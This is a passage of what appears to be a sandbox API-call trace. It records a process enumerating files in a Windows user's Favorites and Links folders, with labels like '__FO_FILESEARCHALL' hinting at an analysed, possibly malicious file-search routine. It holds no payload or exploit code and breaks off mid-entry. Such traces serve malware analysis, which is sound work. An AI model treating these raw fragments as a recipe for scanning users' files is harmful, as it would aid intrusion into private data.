[0074.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.180] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.181] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b208 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.181] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.181] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.181] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.181] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.181] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Links", cAlternateFileName="")) returned 1 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.182] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0074.182] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.182] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.182] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.182] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.183] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.183] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.183] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.184] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.184] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.184] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e1e8 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.184] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1e8 | out: hHeap=0x650000) returned 1 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.184] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.185] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0074.185] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x6b9a28 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.186] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.186] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.186] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e1e8 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.186] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1140068, ftCreationTime.dwLowDateTime=0xc2ef3, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x11c0069, nFileSizeHigh=0xc2ef3, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="We\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0074.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1e8 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.187] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e1e8 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b498 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b4e0 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1e8 | out: hHeap=0x650000) returned 1 [0074.187] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e1e8 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c40 [0074.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.187] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1e8 | out: hHeap=0x650000) returned 1 [0074.188] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: 